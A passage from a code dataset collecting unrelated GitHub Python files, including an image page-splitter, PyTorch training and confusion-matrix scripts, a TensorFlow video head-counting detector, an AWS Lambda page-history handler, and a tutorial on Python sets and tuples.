]\n\n prices.sort()\n min_price = prices[0]\n\n for price in prices[1:]:\n if price - min_price >= price_delta:\n suspect_products.append(result)\n break\n\n return suspect_products\n\n\ndef read_source():\n '''Read source file.\n\n Returns:\n results (list): list of result dictionaries.\n '''\n with open('results.txt') as results_file:\n return json.load(results_file)\n\nif __name__ == '__main__':\n results = read_source()\n suspects = find_price_anomalies(results)\n\n with open('tests/suspects.json', 'w') as suspects_file:\n json.dump(suspects, suspects_file, indent=4)\n","repo_name":"azamb/sortable","sub_path":"tests/anomaly_detection.py","file_name":"anomaly_detection.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"32003196948","text":"#%%\nfrom PIL import Image\nimport numpy as np\nfrom time import 
time\n\nfilename = '1.jpg'\n\nimg = Image.open(filename)\n\n#%%\npixdata = img.load()\n\n# Find the y coordinates of the grey horizontal lines\nline_y_list = []\n\nfor y in range(img.size[1]):\n    if pixdata[0, y] <= (250, 250, 250) and pixdata[0, y] >= (210, 210, 210):\n        line_y_list.append(y)\n\n# Crop away everything outside the top and bottom grey lines\nimg = img.crop((0, line_y_list[0], img.size[0], line_y_list[1]))\n\n#%%\n# Remove the watermark from the image\nstart = time()\npixdata = img.load()\n\nfor y in range(img.size[1]):\n    for x in range(img.size[0]):\n        if len(set(pixdata[x, y])) == 1 and pixdata[x, y] <= (250, 250, 250) and pixdata[x, y] >= (220, 220, 220):\n            pixdata[x, y] = (255, 255, 255)\n\nimg.show()\nprint(time() - start)\n\n#%%\nimg_l = img.convert(\"L\") # convert to greyscale\npixdata_l = img_l.load()\nw, h = img_l.size\nh_list = [0] * h\n\nfor y in range(h):\n    for x in range(w):\n        if pixdata_l[x, y] < 250:\n            h_list[y] += 1\n\nhhist = np.zeros(img_l.size, np.uint8)\nfor y in range(h):\n    for x in range(h_list[y]):\n        hhist[x, y] = 255\n\nImage.fromarray(hhist.T).show()\n\nimg_l.show()\n#%% Split the image into page-height chunks\njpg_quality = 100\nstart = time()\nratio = 3 / 4\nw, h = img.size\npage_height = int(w / ratio)\n\ndef fill_white(page_data, page_height):\n    if page_data.shape[0] < page_height:\n        e_h = page_height - page_data.shape[0]\n        n = np.zeros((e_h, w, 3), np.uint8) + 255\n        page_data = np.vstack((page_data, n))\n    return page_data\n\nimg_org = np.array(img)\nf_name = filename.split('.')[0]\n\nif img_org.shape[0] <= page_height:\n    page_data = fill_white(img_org, page_height)\n    img_out = Image.fromarray(page_data)\n    img_out.save(f'{f_name}_out.jpg', quality=jpg_quality)\nelse:\n    s_position = 0\n    e_position = page_height\n    has_content = True\n    img_gray = np.array(img.convert(\"L\")) # convert to greyscale\n    lower_content = False\n    upper_content = False\n    s_height = 100\n    f_name_index = 0\n\n    while has_content:\n        print(f'Position: {s_position} - {e_position}')\n        area = img_gray[e_position - 10 : e_position]\n        s_list = np.zeros(s_height, int)\n\n        # If the bottom 10 pixel rows of the page contain content, look for a blank gap to split at\n        if np.count_nonzero(area <= 250) > 10:\n            is_blank = False\n            blank_list = []\n\n            for position in range(e_position - s_height, e_position):\n                black_pix = np.count_nonzero(img_gray[position] <= 250)\n                if black_pix == 0 and not is_blank:\n                    blank_list.append(position)\n                    is_blank = True\n                elif black_pix > 0 and is_blank:\n                    blank_list.append(position)\n                    is_blank = False\n\n            if len(blank_list) % 2 == 1:\n                blank_list = blank_list[:-1]\n\n            blank_list = np.array(blank_list).reshape(-1, 2).tolist()\n            print(blank_list)\n            e_position = (blank_list[-1][1] - blank_list[-1][0]) // 2 + blank_list[-1][0]\n            print(f'Change position: {s_position} - {e_position}')\n\n        page_data = img_org[s_position : e_position]\n        page_data = fill_white(page_data, page_height)\n        img_out = Image.fromarray(page_data)\n        f_name_index += 1\n        img_out.save(f'{f_name}_out_{f_name_index}.jpg', quality=jpg_quality)\n\n        s_position = e_position\n        e_position += page_height\n        if s_position > h:\n            has_content = False\n\nprint(time() - start)\n#%%\nstart = time()\nratio = 3 / 4\ncut_h = int(w / ratio)\n\ncroped = img.crop((0, 0, w, cut_h))\n\nif croped.size[1] < cut_h:\n    new_image = Image.new('RGB', (w, cut_h), (255, 255, 255))\n    new_image.paste(croped)\n    croped = new_image\n    print(croped.size[1])\n\ncroped.show()\nprint(time() - start)\n\n#%%\nimg.save(filename.split('.')[0] + '_out.jpg', 
quality=100)","repo_name":"zrhett/learn-matplotlib","sub_path":"dd_image.py","file_name":"dd_image.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70130640078","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Implements a Class for Reading the Australian Senate Election Configuration File. \"\"\"\n\nfrom json import load\n\nfrom aus_senate_audit.constants import CONFIG_FILE_PATH\nfrom aus_senate_audit.constants import FORMAL_PREFERENCES_CSV_NUM_HEADER_LINES\n\n\nclass ConfigReader(object):\n \"\"\" Implements a class for reading the Australian senate election configuration file.\n\n :ivar str _data_file_path: The path to all Australian senate election data.\n :ivar dict _config: The Australian senate election configuration.\n\n NOTE: The configuration file is in a JSON format.\n \"\"\"\n def __init__(self, data_file_path):\n \"\"\" Initializes a :class:`ConfigReader` object.\n\n :param str data_file_path: The path to all Australian senate election data.\n \"\"\"\n self._data_file_path = data_file_path\n self._config = load(open('{}/{}'.format(data_file_path, CONFIG_FILE_PATH), 'r'))\n\n def get_config(self):\n \"\"\" Returns the configuration for the senate election.\n\n :returns: The configuration for the senate election.\n :rtype: dict\n \"\"\"\n return self._config\n\n def get_all_ballots_for_state(self, state):\n \"\"\" Returns all cast ballots for the given state.\n\n :param str state: The abbreviated name of the state to retrieve all cast ballots for.\n\n :returns: All cast ballots for the given state.\n :rtype: list\n \"\"\"\n for state_config in self._config['count']:\n if state_config['name'] == state:\n path_to_formal_preferences = state_config['aec-data']['formal-preferences']\n with open('{}/{}'.format(self._data_file_path, path_to_formal_preferences), 'r') as f:\n return [line.rstrip() for line in f][FORMAL_PREFERENCES_CSV_NUM_HEADER_LINES:]\n","repo_name":"berjc/aus-senate-audit","sub_path":"aus_senate_audit/config_reader.py","file_name":"config_reader.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20971926588","text":"import numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport math\r\nimport torch.nn.functional as F\r\nimport pdb\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\ndef Entropy(input_):\r\n bs = input_.size(0)\r\n epsilon = 1e-5\r\n entropy = -input_ * torch.log(input_ + epsilon)\r\n entropy = torch.sum(entropy, dim=1)\r\n return entropy \r\n\r\n\r\ndef cal_acc(loader, netF, netB, netC, flag=False):\r\n start_test = True\r\n with torch.no_grad():\r\n iter_test = iter(loader)\r\n for i in range(len(loader)):\r\n data = iter_test.next()\r\n inputs = data[0]\r\n labels = data[1]\r\n inputs = inputs.cuda()\r\n outputs = netC(netB(netF(inputs)))\r\n if start_test:\r\n all_output = outputs.float().cpu()\r\n all_label = labels.float()\r\n start_test = False\r\n else:\r\n all_output = torch.cat((all_output, outputs.float().cpu()), 0)\r\n all_label = torch.cat((all_label, labels.float()), 0)\r\n _, predict = torch.max(all_output, 1)\r\n accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])\r\n matrix = confusion_matrix(all_label, torch.squeeze(predict).float())\r\n acc = matrix.diagonal()/matrix.sum(axis=1) * 100\r\n aacc = acc.mean()\r\n aa = [str(np.round(i, 2)) 
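# --- Editor's note (added): a hedged sketch of the JSON layout that ConfigReader in
# config_reader.py above appears to expect, inferred only from the keys it reads
# ('count', 'name', 'aec-data', 'formal-preferences'); the exact schema and the file
# name 'tas.csv' are assumptions for illustration.
# {
#   "count": [
#     {"name": "TAS", "aec-data": {"formal-preferences": "tas.csv"}}
#   ]
# }
# ConfigReader('/data').get_all_ballots_for_state('TAS') would then read /data/tas.csv
# and drop the first FORMAL_PREFERENCES_CSV_NUM_HEADER_LINES lines before returning rows.
# --- end of editor's note ---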
for i in acc]\r\n acc = ' '.join(aa)\r\n return aacc, acc\r\n ","repo_name":"Albert0147/BAIT_SFUDA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"29"} +{"seq_id":"9099455563","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport torchvision\nimport torchvision.transforms as transforms\n\ntorch.set_printoptions(linewidth=120) # display options for output\ntorch.set_grad_enabled(True) # already on by default\n\n# print(torch.__version__)\n# print(torchvision.__version__)\n\n\ndef get_num_correct(preds, labels):\n return preds.argmax(dim=1).eq(labels).sum().item()\n\n\nclass Network(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5)\n self.conv2 = nn.Conv2d(in_channels=6, out_channels=12, kernel_size=5)\n\n self.fc1 = nn.Linear(in_features=12 * 4 * 4, out_features=120)\n self.fc2 = nn.Linear(in_features=120, out_features=60)\n self.out = nn.Linear(in_features=60, out_features=10)\n\n def forward(self, t0):\n # input layer\n t = t0\n\n # hidden conv layer\n t = F.relu(self.conv1(t))\n t = F.max_pool2d(t, kernel_size=2, stride=2)\n\n # hidden conv layer\n t = F.relu(self.conv2(t))\n t = F.max_pool2d(t, kernel_size=2, stride=2)\n\n # hidden linear layer\n t = F.relu(self.fc1(t.reshape(-1, 12 * 4 * 4)))\n\n # hidden linear layer\n t = F.relu(self.fc2(t))\n\n # output layer\n t = self.out(t)\n # t = F.softmax(t, dim=1)\n\n return t\n\n\ntrain_set = torchvision.datasets.FashionMNIST(\n root='./data/FashionMNIST', # location on disk\n train=True, # 60000 for training & 10000 for testing\n download=True, # download if it's not present at the location we specified\n transform=transforms.Compose([\n transforms.ToTensor()\n ]) # A composition of transformations that should be performed on the dataset elements.\n)\n\nnetwork = Network()\n\n# step 1: get batch from the training set\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=100)\noptimizer = optim.Adam(network.parameters(), lr=0.01) # input the weights\n\nfor epoch in range(5): # step 7: do many epochs\n\n total_loss = 0\n total_correct = 0\n\n for batch in train_loader:\n images, labels = batch\n\n preds = network(images) # step 2: pass batch\n loss = F.cross_entropy(preds, labels) # step 3: calculate loss\n\n optimizer.zero_grad() # zero out the existing grads instead of accumulating them\n loss.backward() # step 4: calculate gradients of the loss function\n optimizer.step() # step 5: update weights using the gradients to reduce the loss\n\n total_loss += loss.item()\n total_correct += get_num_correct(preds, labels)\n\n # step 6: do these for every batch in 1 epoch\n print(\"epoch = \", epoch, \", total_correct = \", total_correct, \", loss = \", total_loss)\n\nprint(train_set)\nprint(train_set.targets)\nprint(len(train_set))\nprint(len(train_set.targets))\n\nprint(\"-\" * 50)\n\n\n@torch.no_grad()\ndef get_all_preds(model, loader):\n all_preds = torch.tensor([])\n for batch in loader:\n images, labels = batch\n\n preds = model(images)\n all_preds = torch.cat((all_preds, preds), dim=0)\n\n return all_preds\n\n\nprediction_loader = torch.utils.data.DataLoader(train_set, batch_size=10000)\ntrain_preds = get_all_preds(network, 
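# --- Editor's note (added): a small self-contained illustration of the per-class
# accuracy trick used in cal_acc() above (confusion-matrix diagonal divided by row
# sums); the 2x2 matrix is invented for the example.
import numpy as np
demo_matrix = np.array([[8, 2],   # class 0: 8 of 10 correct
                        [1, 9]])  # class 1: 9 of 10 correct
per_class_acc = demo_matrix.diagonal() / demo_matrix.sum(axis=1) * 100
# per_class_acc -> array([80., 90.]); per_class_acc.mean() -> 85.0, i.e. the 'aacc' value
# --- end of editor's note ---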
prediction_loader)\nprint(train_preds.shape)\n\nprint(train_preds.requires_grad)\nprint(train_preds.grad)\nprint(train_preds.grad_fn)\n\nprint(\"-\" * 50)\n\npreds_correct = get_num_correct(train_preds, train_set.targets)\nprint(\"total correct: \", preds_correct)\nprint(\"accuracy: \", preds_correct / len(train_set))\n\nprint(\"-\" * 50)\n\nstacked = torch.stack((train_set.targets, train_preds.argmax(dim=1)), dim=1)\nprint(stacked.shape) # torch.Size([60000, 2])\nprint(stacked) # true label & predicted label\n# print(stacked[0].tolist()) # [9, 9]\n\nprint(\"-\" * 50)\n\ncmt = torch.zeros(10, 10, dtype=torch.int32)\n# print(cmt)\n\nfor p in stacked:\n true_label, predicted_label = p.tolist()\n cmt[true_label, predicted_label] = cmt[true_label, predicted_label] + 1\n\nprint(cmt)\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nfrom resources.plotcm import plot_confusion_matrix\n\nprint(\"-\" * 50)\n\ncm = confusion_matrix(train_set.targets, train_preds.argmax(dim=1))\nprint(type(cm))\nprint(cm)\n\nprint(\"-\" * 50)\n\nnames = ('T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot')\nplt.figure(figsize=(10, 10))\nplot_confusion_matrix(cm, names)\n","repo_name":"derekhanbaliq/DeepLizard-PyTorch-Tutorial","sub_path":"L28_confusion_matrix.py","file_name":"L28_confusion_matrix.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20494962607","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2019-05-07 16:32\r\n# @Author : Tom Chen\r\n# @Email : chenbaocun@emails.bjut.edu.cn\r\n# @File : video_detect.py\r\n# @Software: PyCharm\r\nimport signal\r\nimport threading\r\nimport time\r\nimport numpy as np\r\nimport os\r\nimport sys\r\nimport tensorflow as tf\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nfrom .image_detect import image_detect\r\nfrom .models import Uploadvideos\r\nfrom .models import NumThreshold\r\nfrom .models import AbnormalImage\r\nfrom ffmpy import FFmpeg\r\nstart = time.time()\r\n\r\n# This is needed since the notebook is stored in the object_detection folder.\r\nsys.path.append(\"..\")\r\n\r\n# Object detection imports\r\nfrom object_detection.utils import label_map_util\r\nfrom object_detection.utils import visualization_utils as vis_util\r\n\r\n# Model preparation\r\n# What model to download.\r\nMODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17' # [30,21] best\r\n\r\ndef video_detect(input_video,output_video,filename,username,):\r\n # Path to frozen detection graph. 
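# --- Editor's note (added): an optional vectorized alternative to the per-pair Python
# loop used above to fill `cmt`; this is an editor suggestion, not part of the original
# tutorial. It encodes each (true, pred) pair as a single index and counts in one call.
import torch
def fast_confusion_matrix(targets, preds, num_classes=10):
    flat = targets * num_classes + preds             # pair (t, p) -> t * num_classes + p
    counts = torch.bincount(flat, minlength=num_classes ** 2)
    return counts.reshape(num_classes, num_classes)
# fast_confusion_matrix(train_set.targets, train_preds.argmax(dim=1)) matches `cmt`.
# --- end of editor's note ---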
This is the actual model that is used for the object detection.\r\n # PATH_TO_CKPT = os.path.join('frozen_inference_graph.pb')\r\n PATH_TO_CKPT = '/root/detect_models/frozen_inference_graph.pb'\r\n # List of the strings that is used to add correct label for each box.\r\n # PATH_TO_LABELS = os.path.join('head_label_map.pbtxt')\r\n PATH_TO_LABELS = '/root/detect_models/head_label_map.pbtxt'\r\n NUM_CLASSES = 1\r\n\r\n # Load a (frozen) Tensorflow model into memory.\r\n detection_graph = tf.Graph()\r\n with detection_graph.as_default():\r\n od_graph_def = tf.GraphDef()\r\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, name='')\r\n\r\n # Loading label map\r\n label_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,\r\n use_display_name=True)\r\n category_index = label_map_util.create_category_index(categories)\r\n\r\n # Helper code\r\n def load_image_into_numpy_array(image):\r\n (im_width, im_height) = image.size\r\n return np.array(image.getdata()).reshape(\r\n (im_height, im_width, 3)).astype(np.uint8)\r\n\r\n # Size, in inches, of the output images.\r\n IMAGE_SIZE = (12, 8)\r\n a=NumThreshold.objects.filter(username=username)\r\n threshold = int(a[0].threshold)\r\n with detection_graph.as_default():\r\n with tf.Session(graph=detection_graph) as sess:\r\n # print(\"当前线程个数\" + str(len(threading.enumerate())))\r\n # print(\"进入了新线程\")\r\n # Definite input and output Tensors for detection_graph\r\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\r\n # Each box represents a part of the image where a particular object was detected.\r\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\r\n # Each score represent how level of confidence for each of the objects.\r\n # Score is shown on the result image, together with the class label.\r\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\r\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\r\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\r\n\r\n # the video to be detected, eg, \"test.mp4\" here\r\n vidcap = cv2.VideoCapture(input_video)\r\n # Default resolutions of the frame are obtained.The default resolutions are system dependent.\r\n # We convert the resolutions from float to integer.\r\n frame_width = int(vidcap.get(3))\r\n frame_height = int(vidcap.get(4)) # 1920*1080\r\n # Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file. 
'M', 'J', 'P', 'G'\r\n            # Streaming normally uses h264/avc encoding, but that encoder is not available on the server, so write MJPG first and convert afterwards.\r\n            out_video = cv2.VideoWriter(output_video, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 29,\r\n                                        (frame_width, frame_height))\r\n\r\n            while (True):\r\n                ret, image = vidcap.read()\r\n                if ret == True:\r\n\r\n                    # image_np = load_image_into_numpy_array(image)\r\n                    image_np = image\r\n\r\n                    # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\r\n                    image_np_expanded = np.expand_dims(image_np, axis=0)\r\n                    # Actual detection.\r\n                    (boxes, scores, classes, num) = sess.run(\r\n                        [detection_boxes, detection_scores, detection_classes, num_detections],\r\n                        feed_dict={image_tensor: image_np_expanded})\r\n                    count = 0\r\n                    for i in np.squeeze(scores):\r\n                        if i > 0.55:\r\n                            count += 1\r\n                    # Visualization of the results of a detection.\r\n                    vis_util.visualize_boxes_and_labels_on_image_array(\r\n                        image_np,\r\n                        np.squeeze(boxes),\r\n                        np.squeeze(classes).astype(np.int32),\r\n                        np.squeeze(scores),\r\n                        category_index,\r\n                        use_normalized_coordinates=True,\r\n                        line_thickness=8)\r\n                    # plt.figure(figsize=IMAGE_SIZE)\r\n                    # plt.imshow(image_np)\r\n                    # Write the frame into the file 'output.avi'\r\n                    if (count > threshold):\r\n                        image_np = cv2.putText(image_np, \"Total:\" + str(count), (frame_width - 250, 70),\r\n                                               cv2.FONT_HERSHEY_SIMPLEX, 1.2, (0, 0, 255), 2)\r\n                    else:\r\n                        image_np = cv2.putText(image_np, \"Total:\" + str(count), (frame_width - 250, 70),\r\n                                               cv2.FONT_HERSHEY_SIMPLEX, 1.2, (0, 255, 0), 2)\r\n                    out_video.write(image_np)\r\n                    # Testing whether this caused the memory leak\r\n                    # plt.close()\r\n\r\n                # Break the loop\r\n                else:\r\n                    break\r\n\r\n            out_video.release()\r\n            end = time.time()\r\n            Uploadvideos.objects.filter(username=username,filename=filename).update(hascalculated=1)\r\n            print(\"Video processing finished, elapsed time: \", end - start)\r\n            input_path='/root/DetectedVideos/'+filename\r\n            output_path='/root/DetectedVideos_AVC/'+filename\r\n            ff = FFmpeg(inputs={input_path: None}, outputs={output_path: '-vcodec h264 -s 1280*720 -acodec copy -f mp4'})\r\n            ff.run()\r\n            print(\"Format conversion succeeded\")\r\n            undetected_videos=Uploadvideos.objects.filter(hascalculated=0)\r\n            if undetected_videos:\r\n                for video in undetected_videos:\r\n                    new_thread = threading.Thread(target=video_detect, args=(\r\n                        \"/root/UploadVideos/\" + video.filename, \"/root/DetectedVideos/\" + video.filename, video.filename,\r\n                        video.username,))\r\n                    new_thread.start()\r\n                    break\r\n            else:\r\n                undetected_image = AbnormalImage.objects.filter(hascalculated=0)\r\n                for image in undetected_image:\r\n                    new_thread = threading.Thread(target=image_detect, args=(\r\n                        \"/root/AbnormalImage/\" + str(image.filename), \"/root/DetectedImage/\" + str(image.filename.split(\".\")[0]+\".jpg\"),\r\n                        image.filename,image.username,))\r\n                    new_thread.start()\r\n                    break\r\n    return 1","repo_name":"Chenbaocun/HeadDetection_Backend","sub_path":"Home/video_detect.py","file_name":"video_detect.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18850000713","text":"import boto3\nimport json\nimport os\nimport requests\n\n_s3_client = boto3.client(\"s3\")\n\n_history_metadata_root_url = os.environ[\"HISTORY_METADATA_ROOT_URL\"]\n_latest_revision_root_url = os.environ[\"LATEST_REVISION_ROOT_URL\"]\n_pages_bucket_name = os.environ[\"PAGES_BUCKET_NAME\"]\n\nclass NoHistoryException(Exception):\n    pass\n\nclass UnexpectedError(Exception):\n    pass\n\ndef _latest_revision(page_name):\n    response = requests.get(\n        \"{}/{}\".format(\n            _latest_revision_root_url,\n            
page_name))\n if response.status_code == 404:\n raise NoHistoryException()\n elif response.status_code != 200:\n raise UnexpectedError()\n return int(response.text)\n\ndef _revision_data(page_name, revision_number):\n revision_metadata = json.loads(\n _s3_client.get_object(\n Bucket = _pages_bucket_name,\n Key = \"{}/{}/{}\".format(\n _history_metadata_root_url,\n page_name,\n revision_number))[\"Body\"].read())\n return {\n \"author\": revision_metadata[\"author\"],\n \"edit_time\": revision_metadata[\"edit_time\"]\n }\n\ndef _revisions(page_name):\n latest_revision = _latest_revision(page_name)\n return {\n i: _revision_data(page_name, i) for i in range(1, latest_revision + 1)\n }\n\n\ndef _handle_cors(event):\n headers = dict()\n try:\n origin_header = event[\"headers\"][\"origin\"]\n if (\"nlab-pages.s3.us-east-2.amazonaws.com\" in origin_header) or \\\n (\"ncatlab.org\" in origin_header):\n headers[\"Access-Control-Allow-Origin\"] = origin_header\n headers[\"Access-Control-Allow-Headers\"] = \"Content-Type\"\n headers[\"Access-Control-Allow-Methods\"] = \"OPTIONS, GET\"\n except KeyError:\n pass\n if event[\"requestContext\"][\"http\"][\"method\"] == \"OPTIONS\":\n if not headers:\n return (\n {\n \"isBase64Encoded\": False,\n \"statusCode\": 200,\n },\n None)\n return (\n {\n \"isBase64Encoded\": False,\n \"statusCode\": 200,\n \"headers\": headers\n },\n None)\n return None, headers\n\ndef lambda_handler(event, context):\n response, headers = _handle_cors(event)\n if response is not None:\n return response\n page_name = event[\"pathParameters\"][\"page_name\"]\n try:\n revisions = _revisions(page_name)\n except NoHistoryException:\n if not headers:\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 404\n }\n else:\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 404,\n \"headers\": headers,\n }\n except Exception as exception:\n raise exception\n if not headers:\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 500,\n \"headers\": {\n \"Content-Type\": \"text/plain\"\n },\n \"body\": \"An unexpected error occurred\"\n }\n else:\n headers[\"Content-Type\"] = \"text/plain\"\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 500,\n \"headers\": headers,\n \"body\": \"An unexpected error occurred\"\n }\n if not headers:\n headers = {\n \"Content-Type\": \"application/json\"\n }\n else:\n headers[\"Content-Type\"] = \"application/json\"\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 200,\n \"headers\": headers,\n \"body\": json.dumps(revisions, indent=2)\n }\n","repo_name":"ncatlab/aws_migration","sub_path":"lambdas/page_history/page_history.py","file_name":"page_history.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"72010215119","text":"#!/usr/bin/env python3\n\n# Storing Data Using Other Collection Types\n\n# Python has a type called set that allows us to store mutable collections of unordered, distinct items. \n# (Remember that a mutable object is one that you can modify.) 
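# --- Editor's note (added): a hedged illustration of the JSON body that page_history.py
# above returns on success, inferred from _revision_data(); the author names and the
# timestamp format are invented examples, not confirmed by the source.
# {
#   "1": {"author": "someAuthor", "edit_time": "2021-01-01 00:00:00"},
#   "2": {"author": "otherAuthor", "edit_time": "2021-02-03 12:34:56"}
# }
# Keys run from 1 to the latest revision number, as assembled by _revisions().
# --- end of editor's note ---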
Here we create a set containing the vowels\nvowels = {'a', 'e', 'i', 'o', 'u'}\nprint (vowels)\n\nvowels = {'a', 'e', 'a', 'a', 'i', 'o', 'u', 'u'}\nprint (vowels)\n\n# they contain the same items, so this prints True\nprint ({'a', 'e', 'i', 'o', 'u'} == {'a', 'e', 'a', 'a', 'i', 'o', 'u', 'u'})\n\n# Variable vowels refers to an object of type set:\nprint (type(vowels))\nprint (type({1, 2, 3}))\nprint (set())\nprint (type(set()))\nprint (set([2, 3, 2, 5]))\n\n# In addition to lists, there are a couple of other types that can be used as arguments to function set. One is a set:\n\nvowels = {'a', 'e', 'a', 'a', 'i', 'o', 'u', 'u'}\nprint (vowels)\nprint (set(vowels))\nprint (set({5, 3, 1}))\nprint (set(range(5)))\n\n\nvowels = {'a', 'e', 'i', 'o', 'u'}\nprint (vowels)\n\nvowels.add('y')\nprint (vowels)\n########\n# In the following code, we show all of these methods in action:\n########\n\nten = set(range(10))\nlows = {0, 1, 2, 3, 4}\nodds = {1, 3, 5, 7, 9}\nlows.add(9)\nprint (lows)\nprint (lows.difference(odds))\nprint (lows.issubset(ten))\nprint (lows.issuperset(odds))\nlows.remove(0)\nprint (lows)\nprint (lows.symmetric_difference(odds))\nprint (lows.union(odds))\nlows.clear()\nprint (lows)\n\n\n###########\n# Set operations in action:\n###########\n\nlows = set([0, 1, 2, 3, 4])\nodds = set([1, 3, 5, 7, 9])\n\nprint (lows - odds) # Equivalent to lows.difference(odds)\nprint (lows & odds) # Equivalent to lows.intersection(odds)\nprint (lows <= odds) # Equivalent to lows.issubset(odds)\nprint (lows >= odds) # Equivalent to lows.issuperset(odds)\nprint (lows | odds) # Equivalent to lows.union(odds)\nprint (lows ^ odds) # Equivalent to lows.symmetric_difference(odds)\n\n# The following program reads each line of the file, strips off the leading and\n# trailing whitespace, and adds the species on that line to the set. Notice the \n# type annotation specifying that the function returns a set of strings:\n\nfrom typing import Set, TextIO\nfrom io import StringIO\ndef observe_birds(observations_file: TextIO) -> Set[str]:\n    \"\"\"Return a set of the bird species listed in observations_file, which has one bird species per line.\n    >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n    >>> birds = observe_birds(infile)\n    >>> 'bird 1' in birds\n    True\n    >>> 'bird 2' in birds\n    True\n    >>> len(birds) == 2\n    True\n    \"\"\"\n    birds_observed = set()\n    for line in observations_file:\n        bird = line.strip()\n        birds_observed.add(bird)\n    return birds_observed\n\nif __name__ == '__main__': \n    import doctest\n    doctest.testmod()\n    with open('file_examples/observations.txt') as observations_file:\n        print(observe_birds(observations_file))\n    \n# Set Contents Must Be Immutable\n\n# >>> S = set()\n# >>> L = [1, 2, 3]\n# >>> S.add(L)\n# Traceback (most recent call last):\n#   File \"<stdin>\", line 1, in <module>\n# TypeError: unhashable type: 'list'\n\n# Storing Data Using Tuples //// A tuple is a collection which is ordered and unchangeable. 
\n# In Python tuples are written with round brackets.\nrock = 'anthracite'\nprint (rock[9])\nprint (rock[0:3])\nprint (rock[-5:])\nfor character in rock[:5]:\n    print(character)\n\n\n # Tuples are written using parentheses instead of brackets; \n # like strings and lists, they can be subscripted, sliced, and looped over:\n\nbases = ('A', 'C', 'G', 'T')\nfor base in bases:\n    print(base)\n\nprint ((8))\nprint (type((8)))\nprint ((8,))\nprint ((5 + 3))\nprint ((5 + 3,))\n\n# Unlike lists, once a tuple is created, it cannot be mutated:\n# However, the objects inside tuples can still be mutated:\n\nlife = (['Canada', 76.5], ['United States', 75.5], ['Mexico', 72.0])\nlife[0][1] = 80.0\nprint (life)\n\n# We’ll build the same tuple as in the previous example,\n# but we’ll do it in steps. First let’s create three lists:\n\ncanada = ['Canada', 76.5]\nusa = ['United States', 75.5]\nmexico = ['Mexico', 72.0]\nlife = (canada, usa, mexico)\nmexico = ['Mexico', 72.5]\nprint (life)\n\n# And because variable canada also refers to that list, it sees the mutation:\n\nlife[0][1] = 80.0\nprint (canada)\n\n# Assigning to Multiple Variables Using Tuples\n\n(x, y) = (10, 20)\nprint (x)\nprint (y)\n\n# Python uses the comma as a tuple constructor, so we can leave off the parentheses:\n\nprint (10, 20)\nx, y = 10, 20\nprint (x)\nprint (y)\n\n# In fact, multiple assignment will work with lists and sets as well. \n# Python will happily pull apart information out of any collection:\n\n[[w, x], [[y], z]] = [{10, 20}, [(30,), 40]]\nprint (w)\nprint (x)\nprint (y)\nprint (z)\n\n\n# One of the most common uses of multiple assignment is to swap the values of two variables:\n\ns1 = 'first'\ns2 = 'second'\ns1, s2 = s2, s1\nprint (s1)\nprint (s2)\n\n\n# The following code uses a Boolean variable, found. Once a species is read from the file, \n# found is assigned False. The program then iterates over the list, looking for that species \n# at index 0 of one of the inner lists. If the species occurs in an inner list, found is assigned True.\n\nfrom typing import TextIO, List, Any\nfrom io import StringIO\n\ndef count_birds(observations_file: TextIO) -> List[List[Any]]:\n    \"\"\"Return a list of [species, count] lists for the bird species in observations_file, which has one bird species per line.\n    >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n    >>> count_birds(infile)\n    [['bird 1', 2], ['bird 2', 1]]\n    \"\"\"\n    bird_counts = []\n    for line in observations_file:\n        bird = 